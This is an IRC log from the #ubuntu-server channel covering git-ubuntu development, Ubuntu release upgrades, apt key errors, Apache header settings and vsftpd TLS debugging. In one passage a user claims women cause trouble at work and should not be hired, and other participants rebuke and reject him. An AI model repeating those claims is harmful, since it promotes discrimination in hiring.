<powersj> rharper: ah interesting! thanks
<nacc> and yeah, yhou have to use daily for artful
<nacc> it would be nice if uvt wrapped this for us
<rharper> nacc: I agree; it's just a passthrough to simplestreams
<nacc> rharper: yep
<rharper> that said, the uvt wrapper can suggest/warn
<rharper> hence the cli rework we've discussed in the past
#ubuntu-server 2017-09-06
<nacc> rbasak: fyi, done refactoring up to remote, so only submit and tag to finish
<nacc> rbasak: these are going to be a pain to review
<coreycb> jamespage: beisner: pike-proposed is ready to promote
<beisner> coreycb jamespage - pike-proposed promoted now.
<cpaelzer> nacc: well, all those upload tags are from before I was allowed to push anything
<cpaelzer> nacc: maybe I experimented with them back then and the recent git ubuntu submit on a totally different branch pushed them?
<cpaelzer> I'd not expect that, but that would be the first explanation that comes to my mind
<cpaelzer> nacc: I certainly have not set upload tags in that repo this week, and we have one in the paelzer repo that I might have pushed in the past before it was clear how to use them, but three are in pkg/...
<cpaelzer> good morning btw
<lordievader> Good morning
<ideopathic> I'm working on a preseed file for pxe uefi install... I'm wondering where to look for documentation on what tasksel tasksel/first multiselect ubuntu-server would correspond to in terms of a normal install.  Could someone point me in the right direction?
<cpaelzer> powersj: nacc: rharper: the sync only clears images that are not reuqested (as you assumed) and "not used"
<cpaelzer> so anything that has a guest defined will not be cleared
<cpaelzer> IIRC
<frickler> jamespage: seeing that you have added python3-ceph pkgs in artful, is there any chance to get these for xenial/jewel, too? my target is OpenStack py3 development, so having something within UCA only would be a valid option
<jamespage> not jewel, but luminous is in the pike uca with py3 packages I think
<jamespage> frickler: ^^
<frickler> jamespage: ah, perfect, I was only looking at ocata uca up to now, but that should be fine, thx
<frickler> jamespage: what would you think about adding a python3-ceph metapackage, similiar to python-ceph?
<jamespage> frickler: we could do that
<jamespage> frickler: most of what I added was sync'ed from the upstream ceph packaging, so if we can get it into github.com/ceph/ceph +1 as it makes my life a whole lot easier :-)
<frickler> jamespage: understood, I'll take a look
<smoser> rbasak, or cyphermox , anyone interested in reviewing
<smoser> https://code.launchpad.net/~smoser/ubuntu/+source/plymouth/+git/plymouth/+merge/330286
<smoser> simple change and i feel fine to upload but figured i'd ask for a review
<SuperLag> Anyone run into issues upgrading to the latest msyql lately?
<SuperLag> http://paste.ubuntu.com/25478468/
<cyphermox> smoser: +1
<smoser> rbasak, is there a easy-ish way to run 'submittodebian' ? from git ubuntu tree ?
<smoser> with a commit-ish
<rbasak> smoser: not that I know about, sorry. But "git send-email" should be available to you now.
<ddstreet> cyphermox rbasak nacc, i'm applying for 'sru developer' position next week, and I'd like to ask if any of you have time and are willing, you have all sponsored sru uploads for me in the past, could you add an endorsement to my application page?   https://wiki.ubuntu.com/ddstreet/UbuntuSRUDeveloperApplication
<madLyfe> lordievader: you know how to add a module to initrd in ubuntu server iso?
<nacc> ddstreet: will do it this week!
<ddstreet> naac thanks!
<ddstreet> nacc thanks!
<lordievader> madLyfe: add it to the config. It is too long ago that I made Ubuntu initrd's to remember where exactly.
<nacc> cpaelzer: oh it's fine (upload tags), just surprising
<nacc> rbasak: given scheduling, etc. how do you want to handle review of the refactor? would it make sense to push to edge/beta/candidate and just test heavily as the review process by our squad?
<rbasak> nacc: good question. We should a agree a way to avoid blocking you while I'm out.
<rbasak> nacc: maybe ask ahasenack to review?
<nacc> rbasak: yeah, good idea
<nacc> ahasenack: sorry for that :)
<nacc> rbasak: i'm also trying to make sure pylint3 doesn't indicate any fatal errors (ignoring style generally) for now
<rbasak> That's a good idea.
<rbasak> I had it in mind that we should eventually introduce something like that and then perhaps start ratcheting it up.
<nacc> rbasak: yep, i'm cleaning up the smaller modules as much as I can in the process (indentation, etc.), as it also does make it easier to see some of the variable names
<nacc> rbasak: but importer.py, e.g., is quite large :)
<nacc> we also are able to do some consolidation now that we can share code easier (e.g., submit and lint can use the same logic for figuring out the target-branch)
<nacc> which i think will resolve cpaelzer's issue with having to specify --target-branch at all for `git ubuntu submit`
<cpaelzer> yeah would be nice
<cpaelzer> I mean "issue" is already a too hard word for it
<ybaumy> is there a way to dist-upgrade 14.04 to 16.04 without problems? yesterday i tried upgrading and it ended in a new install. initscripts was broken and most of the binaries in bin und sbin were missing
<ybaumy> i couldnt even initiate a reboot anymore
<ybaumy> init was gone
<joelio> done many 14.04-16.04 dist-upgrades with no issue
<joelio> are you using do-release-upgrade?
<nacc> ybaumy: you don't dist-upgrade anymore, use do-release-upgrade
<ybaumy> joelio: it was a mess and it was my first time
<ybaumy> nacc: thats what i did. i just used the term dist-upgrade
<joelio> sounds like you broke it then, as missing bin and sbin stuff sounds a bit off
<joelio> or there were non-standard things added to 14.04 that br0k the upgrade?
<ybaumy> joelio: i broke it? well i dont have logs but how could i have done that if i used that do-release-upgrade
<ybaumy> joelio: well on that server there were plesk repos enabled
<joelio> generally it should disable the repos, the problem is if you've got packages that are non-standard that interact in strange ways with upstream packages
<joelio> that problem expresses itself even more when doing a dist-upgrade
<joelio> if it's a vanilla install, then generally (well 100% of the time imhe) then it just works
<ybaumy> well newly install was straight forward and in the end maybe i have a clean install and its ok for me. but if im in the situation again i would like to know how to progress from start
<joelio> I'd basically no dist-upgrade if you're doing stuff non-standard
<joelio> but use config management etc. to rebuild the box on a new target distro
<joelio> difficult to say what broke if there are no logs mind
<joelio> perhaps could have been easy fix :)
<ybaumy> well next time i will ask here but it was this box im on and im using for irc
<ybaumy> though
<ybaumy> its painful to new install. its like sles11 to sles12 on power from big endian to little
<Ussat> Actually, as someone who runs SLES and RHEL on power....it isnt that bad at all
<ybaumy> i dont know how many system you have running on sles but new install 1000 of them its a pain is the ass
<ybaumy> its als SAP instances
<Ussat> surely you dont do this manually
<ybaumy> no of course not
<ybaumy> but it would be easier to uprade in place IMO
<ybaumy> on AIX things were easy. add a disk make the upgrade .. reboot .. finished
<nacc> have a better setup in place and it's painless to new install
<nacc> this sounds like aprocess problem, not a technical one (beyond the do-release-upgrade failing)
<nacc> but if you dont' have logs for d-r-u failing (they are stored in /var/log, iirc), then it's not possible to really debug/help
<ybaumy> nacc: will have the next time. just wanted to ask if there are general problems
<nacc> ybaumy: there are not known general problems between 14.04 -> 16.04, I think many have done it
<ybaumy> nacc: is it possible to do something like alternate disk install on linux?
<nacc> ybaumy: you mean install to a different disk? I'm not familiar with the term (it's been a while since i used RHEL/SLES and i've never used AIX)
<ybaumy> nacc: you add a disk make a copy of your system to this disk. make the upgrade on the new disk and then boot from the new one
<nacc> ybaumy: i mean, you can just do that in linux
<nacc> ybaumy: i don't think there is a special tool in the installer to do it (but i might be wrong)
<ybaumy> nacc: well i just wanted to ask. thats one the cool AIX features
<nacc> ybaumy: probably means its patented
<ybaumy> nacc: probably even if ibm has contributed alot to the OSS community
<ybaumy> nacc: i had a system migrated from 4.3.3 to 5.1 to 5.2 to 5.3 to 6.1 but then got decommissioned. but the pain i had was minimal
<nacc> ybaumy: and i know people who have done upgrades of servers over many ubuntu. But also, in the new world, you just reinstall. Separate your data, use backups, etc.
<nacc> ybaumy: use containers, or VMs, there are lots of other choices than big metal
<ybaumy> nacc:  im still learning. im into linux for 2 years and im doing openstack and and docker and shit. but this is all like a whole new world to me
<ybaumy> its like everyday i learn 20 things new
<ybaumy> IT was so easy :D
<ybaumy> 10 years ago
<powersj> cpaelzer: ever seen this before https://paste.ubuntu.com/25479276/
<powersj> that's on the power system trying to launch a kvm guest
<powersj> ah this looks like LP: #1709784
<ubottu> Launchpad bug 1709784 in linux (Ubuntu Xenial) "KVM on 16.04.3 throws an error" [Critical,Fix committed] https://launchpad.net/bugs/1709784
<joelio> ybaumy: ever thought of using lxc or some virt to handle your plesk stuff, if you abstract it away then it's a bit easier to manager. Plus then you can do test upgrades, snapshotting, rollback etc etc etc
<joelio> although given it's plesk, probably want to have some deep seated system stuff
<joelio> (which could still work!)
<joelio> what I'm getting at, is if you abstract your systems a bit into containers or virt (where you can) then they're a bit easier to deal with imho
<joelio> or use lvm/zfs/btrfs snapshotting on the os level itself etc
<joelio> loads of ways to skin it :)
<joelio> ahh, I see nacc mentioned that too, good stuff :)
<powersj> nacc: ever have issues with not finding the git-ubuntu binary?
<powersj> also who should I tell git-ubuntu is running the tests? e.g. git config --global gitubuntu.lpuser <user>
<nacc> powersj: from the snap?
<nacc> powersj: given that we are doing a no-push import and no other writes, i think you can use usd-importer-bot
<powersj> nacc: https://paste.ubuntu.com/25479991/
<nacc> powersj: that's ... weird
<powersj> yeah...
<powersj> SSH'ing directly in and it worked as expected
<nacc> powersj: sshing, `which` finds it?
<nacc> powersj: oh you might need to do a login shell
<powersj> ah
<powersj> nacc: ok here are the results so far: https://paste.ubuntu.com/25479994/
<powersj> there is one error that pops up
<nacc> powersj: looking
<nacc> powersj: this is with master?
<powersj> yes
<nacc> powersj: debugging
<powersj> nacc: thx, here is the full run as it just finished https://paste.ubuntu.com/25480030/ took just under an hour
<smoser> nacc, https://code.launchpad.net/~smoser/ubuntu/+source/open-iscsi/+git/open-iscsi/+merge/330315
<smoser> that'd be nice if you looked. there is a mess of stuff to fix with netplan transition, but that is one of the things.
<smoser> i have to run
<nacc> smoser: will look
<nacc> powersj: reading that too
<nacc> powersj: ok, on my bastion (running the current snap), it didn't fail to reimport ipsec-tools
<nacc> powersj: will fix the popd message
<nacc> powersj: fix pushed to master for that
<powersj> nacc: th
<powersj> thx
<nacc> powersj: i'm not sure on the reimport failure still
<powersj> nacc: ok I'm planning on re-running shortly and will see if it reproduces. Should I expect a run to take ~hour?
<nacc> powersj: yeah, the from-scratch import takes a while
<Epx998> Mmm nic bonding
<dpb1> how do I tell if a package is seeded in the install I'm running, or if it's something that I installed via request, or dependency of a request I made?
<nacc> dpb1: apt-mark for the latter bits, i think
<dpb1> a) seeded  b) installed by me direct or through dep
<dpb1> ok
 * dpb1 runs
<Epx998> its too bad the installer doesnt offer bonding out of the gate
<nacc> powersj: i wonder if we can also add `pylint3 -E gitubuntu --ignored-modules=pygit2` to our jenkins job?
<nacc> powersj: it will probably fail on master for now, but is clean on my refactored branch
<powersj> nacc: sure can
<powersj> can you add a card for that too?
<nacc> powersj: ack
<nacc> powersj: done
<powersj> nacc: thx
<Epx998> is puppetserver 2.8 puppet 4 or 5?
<hehehe> hey hey
<hehehe> sarnold: whatsu
<hehehe> I was talking to some people - hiring process for some project, and I felt uneasy about hiring a girl, dunno some kind of fear maybe
<dpb1> not cool.
<hehehe> well I met 1 guy from Israel 20 plus years C++
<hehehe> he said there nearly no one hires girls
<hehehe> as they cause troubles
<hehehe> :)
<dpb1> hehehe: please stop talking like that
<hehehe> why
<hehehe> I simply want to ask fellow people opinion
<dpb1> not acceptable behavior on this channel
<hehehe> shutting subject up simply reinforce  the impression
<hehehe> that girls are best not hired
<hehehe> just look at your behaviour
<hehehe> ty for the feedback dpb1
<Ussat> hehehe, here is a opinion, you are a sexist idiot
<Ussat> there
<hehehe> Ussat: ok and for statistics you are male?
<hehehe> and yes girls are way more likely to cause issues at work
<hehehe> statistically
<hehehe> however I was thinking maybe ....
<Ussat> can we get a op to regulate here
<hehehe> Ussat: regulate what?
<dpb1> was just looking at how to do that
<hehehe> pm hehehe to complain
<hehehe> use pastebin :)
<Ussat> Dude you have been banned in a few other channels I am in for similar stuff
<hehehe> Ussat: 0 ideas what u on about
<hehehe> if you want to stay on topic that is hiring girls go ahead
<hehehe> plus I think if company expands and our hiring policy is public we can get pretty cool candidates who love to work in such enviroment
<nacc> hehehe: what you are describing is illegal in several countries. Please take it elsewhere, as it absolutely not ontopic
<hehehe> nacc: then why do u comment
<hehehe> if its not on topic
<hehehe> :)
<hehehe> plus surely business can decide who they hire
<Ussat> not only illegal, but wrong.....but anyway /ignore does wonders
<nacc> powersj: something seems up: https://jenkins.ubuntu.com/server/job/git-ubuntu-ci/24/console, appears to need a proxy setup?
<nacc> (snap failed to build)
<nacc> hehehe: if your metric for being ontopic is someone telling you that youare *offtopic*, you are 100% a troll and I would politely ask you to leave the channel and not come back
<powersj> nacc: "git.sigxcpu.org"?? is that a new dependency being pulled in?
<nacc> powersj: yeah, gbp built from src
<nacc> (in the snap)
<powersj> ahhh
<nacc> and while i am hosting it on github, the submodules come from upstream
<powersj> then yes I'll need to use proxy and hope we can get out
<nacc> heh
<powersj> nacc: I've got a shell script that builds the snap and installs it on xenial, only need to figure out how to invoke the test script now so it finds git-ubuntu
<nacc> powersj: this is the same PATH thing you were hitting before?
<powersj> yeah
<nacc> powersj: i think you can do something like `ssh bash -l -c ...`
<powersj> heh -l... too easy
<nacc> powersj: i'm not 100% -- i think either way, it's possibly becuase you need to be running in a shell. The login shell may be overkill (it might be sufficient to just be in bash as PATH expansion to include /snap/bin is from /etc/profile.d/)
<powersj> nacc: ok I'll play with both for now I've got -l in there thanks!
<powersj> here is what I got btw https://github.com/canonical-server/test-scripts/blob/master/git-ubuntu/integration_test
<nacc> powersj: great, thanks
 * Epx998 waits for saltstack repo email...
#ubuntu-server 2017-09-07
<axisys> failing to upgrade lucid .. this is what I tried so far
<axisys> http://dpaste.com/0KW2Y2R.txt
<axisys> any suggestion?
<TJ-> axisys: failure to authenticate suggests you've not installed the updated keyrings - I *think* the archive keys rotated at some point after 10.04
<axisys> https://bugs.launchpad.net/ubuntu/+source/update-manager/+bug/1513232 comment #3 seems to be resolving .. now seems to be upgrading
<ubottu> Launchpad bug 1513232 in update-manager (Ubuntu Precise) "do-release-upgrade no longer works from lucid to precise" [Undecided,Confirmed]
<TJ-> yes, comment #11 confirms it's a key issue and gives a command to fetch the missing key
<axisys> upgrade completed and now I am getting a key error on precise apt-get update
<axisys> W: GPG error: http://us.archive.ubuntu.com precise-updates Release: The following signatures were invalid: BADSIG 40976EAF437D05B5 Ubuntu Archive Automatic Signing Key <ftpmaster@ubuntu.com>
<axisys> so I guess that key from #11 is not correct anymore
<axisys> http://dpaste.com/18KFVNX.txt
<sarnold> axisys: check 'dmesg' output to see if you've had any IO errors
<sarnold> axisys: try manually checking the files in /var/lib/apt/lists/
<axisys> this fixed it
<axisys> https://askubuntu.com/questions/198371/apt-encounters-errors-with-bad-gpg-keys
<axisys> sarnold: right
<axisys> needed a new lists dir
<sarnold> heh, that's a bit .. blunt, but sounds like it worked :)
<axisys> do-release-upgrade on precise saying no new release found
<axisys> /etc/update-manager/release-upgrades says Prompt=lts .. so why not?
<axisys> interesting.. probably some cache.. after a reboot, it is accepting the command
<sarnold> axisys: do be sure to check dmesg to make sure you're not getting IO errors
<sarnold> we get a lot of bug reports with dying drives in the logs :(
<axisys> ok.. also I am running a vagrant image for testing out the process in my laptop.. preparing for upgrading few next week :-)
<axisys> but good suggestion
<axisys> i do run smartmon as a cronjob on this laptop, also..
<sarnold> I love to hear that you're testing it first, always a decent idea :)
<sarnold> then it's more likely the file was corrupted in transit. that happens.
<axisys> or loose my job while playing with prod server.. hehe
<lordievader> Good morning
<cpaelzer> hi lordievader
<cpaelzer> good morning to all as well
<lordievader> Hey cpaelzer_, how are you doing?
<cpaelzer> great, I hope you are fine as well today
<lordievader> Jup doing okay here. Today I'm going to update my firewall rules :D
<lordievader> In other words, break everything :P
<hateball> \o/
<cpaelzer> ready to see your disconnect timeout then :-)
<lordievader> As I am using Matrix that should not happen ;) If it does I might have managed to break a server somewhere else on the campus :P
<iot17> Hey guys, i'm doing a quick survey (10 questions) about "Internet of things". I would be very thankful if you could take some time and fill it in. Cheers! https://www.umfrageonline.ch/s/iot17
<scottjl> done!
<axisys> iot17: done
<axisys> guess iot17 left
<M3mphiZ> Is it normal that as root i can run 'mysql -u root -p' and even without entering the correct password i get in?
<lordcirth_work> M3mphiZ, You are root anyway, what's the point?
<lordcirth_work> M3mphiZ, I think if you try to connect to '127.0.0.1' rather than the default localhost it asks
<lordcirth_work> Because 127.0.0.1 != localhost in mysql o_O
<M3mphiZ> lordcirth_work: well its interesting, because after settings this: UPDATE mysql.user SET authentication_string=PASSWORD('<your-password>'), plugin='mysql_native_password' WHERE user='root'; I need the correct password.
<necrophcodr> Is it possible to configure Apache to set a header explicitly?
<necrophcodr> This is very wrong, but due to infrastructure and horrible code, I need to set the HTTPS header without enabling HTTPS or SSL
<necrophcodr> Is that even possible?
<lordcirth_work> necrophcodr, you have a reverse proxy adding TLS but not the header?
<necrophcodr> lordcirth_work, oh no, it's much worse. I have Apache2 proxying from TLS to varnish, which then forwards to non-TLS port 80
<necrophcodr> varnish removes the HTTPS header because it's not running with certificates, and our setup wouldn't really support that either way.
<sdeziel> necrophcodr: RequestHeader set X-Forwarded-Proto "https"
<necrophcodr> sdeziel, i have not actually tried this, i'll give it a shot
<necrophcodr> sdeziel, but that won't actually set the HTTPS header, will it? like at any point in the stack?
<lordcirth_work> necrophcodr, can't you configure varnish to set the header again?
<lordcirth_work> Or, you know, fix the whole setup
<sdeziel> necrophcodr: this will create the defacto standard header named X-Forwarded-Proto
<necrophcodr> lordcirth_work, i'm not sure, but varnish forwards back to apache on port 80 (this is crazy), and apache might remove the https header too when not received on port 80.
<necrophcodr> lordcirth_work, i can't fix the whole setup. there's too many servers running this kind of setup, and it's a LOT of moving integrated parts.
<necrophcodr> if it was feasible to change, i would
<lordcirth_work> Sucks.  It doesn't sound very feasible to maintain either
<necrophcodr> i'm not asking because i find it fun, i'm asking because it's the only feasible solution i've come up with
<necrophcodr> it is feasible to maintain, since there's not much maintenance.
<lordcirth_work> How did it get set up that way?
<necrophcodr> doesn't matter
<necrophcodr> the problem is that we're running the infrastructure with apache2, and now need to also integrate varnish
<necrophcodr> and we're not setting apache2 vhosts up ourselves, that's managed by other systems
<necrophcodr> but we can modify the apache2 vhost templates, and the actual vhosts
<necrophcodr> since this is also for shared hosting, there's a lot of stuff that needs to fit together
<sdeziel> necrophcodr: if you control the backends' vhost templates, why not set the header in there?
<necrophcodr> sdeziel, the backend is apache
<necrophcodr> i'm talking about apache vhost templates
<sdeziel> I understood as much
<necrophcodr> that's where i'd like to set the header
<necrophcodr> but it needs to be the HTTPS header
<sdeziel> necrophcodr: I still think that RequestHeader is what you want
<sdeziel> https://httpd.apache.org/docs/2.4/mod/mod_headers.html
<necrophcodr> sdeziel, i'll give it another go
<necrophcodr> sdeziel, if i do RequestHeader set HTTPS "on" then it isn't set
<necrophcodr> or rather, Apache will set the HTTP_HTTPS header to "on"
<necrophcodr> RequestHeader modifieds HTTP_* headers
<necrophcodr> not all headers
<sdeziel> necrophcodr: are you saying that Apache will add the prefix "HTTP_" to the header name you added?
<necrophcodr> sdeziel, yes
<sdeziel> necrophcodr: I've never seen that behaviour and doubt it's Apache's doing
<necrophcodr> I'm forwarding it to a PHP fcgid script that simply var_dumps $_SERVER
<necrophcodr> it does nothing else at all
<sdeziel> https://httpd.apache.org/mod_fcgid/mod/mod_fcgid.html#fcgidpassheader ?
<sdeziel> at this point, it's no longer a HTTP header but a env variable with the prefix HTTP_$headername
<necrophcodr> so now it still has the prefix HTTP
<necrophcodr> but i still need to set the HTTPS header
<necrophcodr> oh wait
<necrophcodr> no it may actually work
<necrophcodr> sdeziel, thanks, that appears to work!
<sdeziel> necrophcodr: great, np
#ubuntu-server 2017-09-08
<lordievader> Good morning
<wretchedspirit> hi!
<lordievader> o/
<oskaress> Anyone with any knowledge about setting up vsftpd on an ubuntu 16.04 server?
<andol> oskaress: https://help.ubuntu.com/lts/serverguide/ftp-server.html might be a good place to start.
<andol> See also http://mywiki.wooledge.org/FtpMustDie
<oskaress> The thing is, I've set up vsftpd by following a guide found on Digital Ocean where they enable TTL/SSL to provide encryption. Once I created the certificate filezilla wouldn't connect. I get a 500 command not understood error on both the AUTH TLS and AUTH SSL command. Read through the config file several times and everything should be set up correct. Any ideas what can cause the issue?
<wretchedspirit> which protocol are you trying to connect with on filezilla?
<oskaress> FTP with the Explicit FTP over TLS encryption
<oskaress> Can it be something with the transfer mode? Currently it's only set as default
<wretchedspirit> have you tested with implicit?
<oskaress> Yes, conection refused by the server
<wretchedspirit> OK
<wretchedspirit> port 22?
<wretchedspirit> or, at least, are you sure you're using the right port & that it's open
<tomreyn> what do the server logs tell you about it?
<oskaress> I've tried both port 21, 22 and 990, all of them are open. FTPS uses port 990 by default, right? I'll check the server logs
<tomreyn> lsof -i :990
<tomreyn> the port you configured when configuring the server is the one the server listens on
<oskaress> I didn't configue what port the server should listen to, I just opened up the necessary ports. Where should I configure what port the server listens on?
<oskaress> tomreyn Which logs do you mean by server logs?
<tomreyn> oskaress: i'm not sure where vsftpd logs to, probably either /var/log/vsftpd* or /var/log/syslog
<tomreyn> blindly following an outdated how-to is a recipe for desaster.
<_ruben> meh, this is annoying: the squid init script returns 0 when it fails to (re)start .. even status returns 0 in that case :/
<oskaress> The vsftpd log contains no error. The tutorial I'm following is from September 2, 2016 and made for Ubuntu 16.04 which I am using, so I don't know about the outdated part...
<tomreyn> oh, well the only tutorial i found when googling (you did not provide its location) for "Digital Ocean vsftpd tutorial" was one from 2013
<tomreyn> still, like previously opinted out here, unless you have a very specific use case, dont set up ftp servers in 2017
<oskaress> Sorry, my bad. The tutorial I'm following is this one https://www.digitalocean.com/community/tutorials/how-to-set-up-vsftpd-for-a-user-s-directory-on-ubuntu-16-04
<oskaress> The case is indeed very specific, I've noticed that you shouldn't set up ftp server unless you really have to, and in this case I unfortunately have to
<tomreyn> maybe there's a better alternative, feel free to discuss your needs
<oskaress> I need a scanner to send the scanned image to a server, and what I know, the scanners that are used can only send by FTP
<tomreyn> so that's a flatbed scanner which creates imagery from paper / physical objects? do those scanners actually support ftps then?
<tomreyn> what's the scanner model?
<tomreyn> i assume those scanners are not directly connected to the internet?
<oskaress> It's a MFP (Multi Functional Printer) from Toshiba, and they are connected directly to the internet
<tomreyn> that's usually not a good idea, those devices are usually full of exploitable software bugs.
<oskaress> Well yeah, unfortunately it's not my call. I pretty much just have to solve the ftp connection between them
<tomreyn> it'd be better to do the ftp transfer to a hardened system that is local to the router and has an internet upstream and can copy the imagery elsehwere over the internet.
<tomreyn> a 30 usd computer running linux is good enough there.
<tomreyn> so do those toshibas actually support ftp over ssl / tls?
<tomreyn> otherwise setting it up on the server doesn't seem to make much sense.
<tomreyn> if you'd still like to test the vsftpd servers' TLS you could: openssl s_client -startls ftp -debug -connect hostname:port
<oskaress> The problem right now is that I can't even use filezille to FTP into my FTP server via vsftpd
<tomreyn> i just provided a command to debug that.
<tomreyn> there is also the debug_ssl option to vsftpd, which would ensure more logging on ssl sessions.
<oskaress> The command you provided says "no peer certificate available" and "No client certificate CA names sent"
<tomreyn> did you replace hostname:port by the hostname and port your ftp server listens on?
<tomreyn> well you probably did. but there's no startssl support at the hostname:port you pointed it to.
<oskaress> Yes, I mean it connects and gets the same error, it says 500 Command not understood, but further down in the respone it says what I wrote above
<tomreyn> maybe try without the '-starttls ftp' option then
<oskaress> Hmm looks like it worked without the -starttls ftp option.
<tomreyn> try to have a quick ftp chat then
<tomreyn> https://www.webdigi.co.uk/blog/2009/ftp-using-raw-commands-and-telnet/
<tomreyn> no need to telnet, you're already connected with openssl
<tomreyn> just type "USER anonymous" and press enter and see what the server responds
<oskaress> I got a 'write:errno=10054' before, didn't see that.
<tomreyn> thats connection refused, i.e. the destination tcp port isnt accepting connections.
<oskaress> Hmm wierd, I connected to port 21 and in the firewall it allows connections
<tomreyn> maybe you need to read the man page about implicit_ssl
<fishcooker> do-release-upgrade -d output is Checking for a new Ubuntu release ... Upgrades to the development release are only ... available from the latest supported release. what should i do if i want 17.10 from 17.04
<TJ-> fishcooker: if /etc/update-manager-release-upgrades has "Prompt-nornal" then you shouldn't need the "-d" flag, it should offer 17.10 from 17.04
<Pici> 17.10 hasn't been released yet...
<TJ-> that's a good point... for some reason I am thinking we're in 2018 already :D
<TJ-> maybe it's set to LTS only
<fishcooker> thanks Pici
<fishcooker> what if TJ-
<fishcooker> with gnome as default TJ- :D
<sobukus> Anyone successfully running Ubuntu 16.04 on server hardware with Intel Matrix RAID? I apparently got this issue Red Hat fixed 5 years ago: https://bugzilla.redhat.com/show_bug.cgi?id=785739
<ubottu> bugzilla.redhat.com bug 785739 in mdadm "update mdadm/mdmon to work with systemd unrolling mounts to initramfs mount on shutdown" [Unspecified,Closed: rawhide]
<sobukus> Ubuntu bug report is https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1587142
<ubottu> Launchpad bug 1587142 in systemd (Ubuntu) "Shutdown hangs in md kworker after "Reached target Shutdown."" [Critical,Confirmed]
<sobukus> This is a rather nasty showstopper for me, after having invested time to adapt a provisioning set up to put the system on a RAID1.
<sobukus> And didn't the RedHat people not tell anyone? It's a bit disturbing that this bug lurks for 5 years. My CentOS 7 systems on similar hardware boot and reboot nicely.
<ahasenack> sobukus: that's sad :/ Can you add the rh bug link to the ubuntu report, if it's not there already?
<gunix> guys, any ideea where would be the best place to publish this: http://gunix.cloud/blog/wordpresscluster.html
<gunix> ?
<gunix> i was thinking about creating a blog and publishing it, because more similar articles will follow. any ideea?
<gunix> everything was done on ubuntu server
<PCatinean> hey all
<PCatinean> I'm having an issue with vsftpd that I cannot change directory after I'm logged in
<PCatinean> and I cannot see any errors in the logs, confusing
<rbasak> nacc: I don't think you were planning on it anyway, but please don't push anything new to git-ubuntu stable until after my talk tomorrow :)
<nacc> rbasak: ack, it'll all be in edge, if anywhere
<nacc> rbasak: do you incl. bugfixes in that request?
<nacc> rbasak: i've found a handful of edge-case syntax errors. They can wait til Monday, though
<rbasak> nacc: easiest if we can defer the fixes too, please.
<rbasak> Then I don't have to re-verify anything
<nacc> rbasak: +1
<rbasak> Thanks!
<rbasak> nacc: interesting. I just used my artful laptop with the stable snap to do an import, and I got my hang on push again.
<rbasak> So it's not Xenial-specific
<nacc> rbasak: is it your laptop specific? :)
<rbasak> No it's a different machine entirely.
<rbasak> The only commonality is my username and my Internet connection.
<nacc> rbasak: i genuinely don't know how to debug it. We haven't seen it a single time from either my system (at home) or the bastion.
<rbasak> nacc: unrelated: seen this before? http://paste.ubuntu.com/25491004/
<rbasak> Perhaps an issue with snapcraft vs. quilt?
<rbasak> On the hanging issue, I accept I'm the only one in a position to debug it.
<rbasak> I wonder if it is because I have a ~20ms RTT to git.launchpad.net (being in the UK).
<powersj> rbasak: is git-ubuntu import hanging for you?
<rbasak> powersj: on occasion. Always at the same point.
<powersj> currently stuck here: 09/08/2017 16:15:10 - INFO:Importing patches-unapplied 1:0.7.1-1.2 to debian/lenny
<rbasak> powersj: only on push.
<powersj> ah
<rbasak> powersj: your issue is different I think.
<nacc> rbasak: powersj saw the same in their jenkins job
<powersj> I assumed it was proxy or network access related, but wanted to check
<nacc> rbasak: as the backtrace
<nacc> rbasak: but i have no idea why
<rbasak> powersj: could you have a firewall issue in downloading sources?
<nacc> rbasak: and the bastion, again, doesn't reproduce it
<powersj> rbasak: that could also be it
<rbasak> powersj: does "pull-lp-source <package>" work? That's pretty close to what it's trying to do there I think.
<nacc> rbasak: it's technically identical, i think (the same underlying path)
<rbasak> Admittedly perhaps a pain to check if you don't have ubuntu-dev-tools installed.
<nacc> rbasak: what's weird with the quilt error is that it seems to think that `quilt push` is invalid
<nacc> rbasak: i don't see how that's possible
<coreycb> beisner: the ocata point release packages are ready to promote to ocata-updates for https://bugs.launchpad.net/ubuntu/+source/nova/+bug/1706297
<ubottu> Launchpad bug 1706297 in nova (Ubuntu Zesty) "[SRU] ocata stable releases" [Undecided,Fix committed]
<rbasak> nacc: note an empty line 4.
<nacc> rbasak: ooooh
<nacc> rbasak: one sec
<rbasak> nacc: I think that looks like a botched installation of quilt, which is why I suspected a snapcraft interaction.
<nacc> rbasak: +1
<nacc> rbasak: and probably the bastion has quilte installed
<rbasak> nacc: BTW, I don't need this fixed. I just noticed it.
<nacc> rbasak: it's probably a path-ish thing
<nacc> rbasak: how should we interlock this? i think we need it fixed for the jenkins job, which we can't run unless it's fixed, but you don't want changes to master :)
<nacc> i guess i can leave it in my branch
<nacc> and then the jenkins job will build a snap from that branch
<nacc> powersj: --^ ?
<nacc> ah ha
<rbasak> nacc: I don't mind changes to master; I just don't want changes to stable :-P
<nacc>  : ${QUILT_DIR=/usr/share/quilt}
<nacc> rbasak: oh right, just not the snap?
<rbasak> nacc: right - just not the stable snap. Anything else is fine.
<nacc> powersj: ok, i see the fix for the quilt issue you and rbasak hit, i'll push it to my branch for now, and we can use that to test?
<powersj> nacc: sure, I need to figure out this hang though as well
<nacc> actually, i can push it to master, along with the bugfixes
<nacc> powersj: is it the proxy issue?
<nacc> powersj: if i don't set http_proxy on my bastion, it just sits there forever
<powersj> nacc: you set it via bash env variable and not via git config?
<powersj> I tried both
<rbasak> git config won't be sufficient I don't think.
<powersj> ok
<rbasak> "git ubuntu" internals won't see it.
<nacc> powersj: export it in the bash wrapper that calls git ubuntu
<nacc> powersj: that's how i do it the bastion
<nacc> powersj: let me hop back on vpn and copy out my script
<powersj> nacc: thx let me try that again
<powersj> I did do http_proxy=http://squid.internal:3128/ git-ubuntu -v --reimport --no-push ipsec-tools
<powersj> and saw a hang so wondering
<nacc> powersj: i think you need to export it
<nacc> powersj: as you get weird interactions with snaps otherwise
<nacc> powersj: as they exec and exec and exec :)
<powersj> hm ok
<rbasak> nacc: I think the two mechanisms are equivalent in this case.
<rbasak> export foo=bar; baz === foo=bar baz
<rbasak> As far as baz is concerned.
<nacc> rbasak: i would like to think that as well
<nacc> rbasak: i don't know enough about the voodoo that is snaps
<nacc> rbasak: and i know my method works :)
<rbasak> I don't know much about snaps, but I am pretty confident that it's impossible for baz to be able to tell the difference.
<nacc> rbasak: again, i agree :)
<rbasak> Variables being exported is a shell thing. As far as the kernel is concerned, shell variables don't exist and the only thing it sees is the environment. And shell variables can't be passed in to random programs because there's no interface for that.
<beisner> hi coreycb: fyi, ocata srus pushed to uca updates
<nacc> rbasak: yes, i understand
<nacc> rbasak: if you would like to debug powersj's problem, you're welcome to
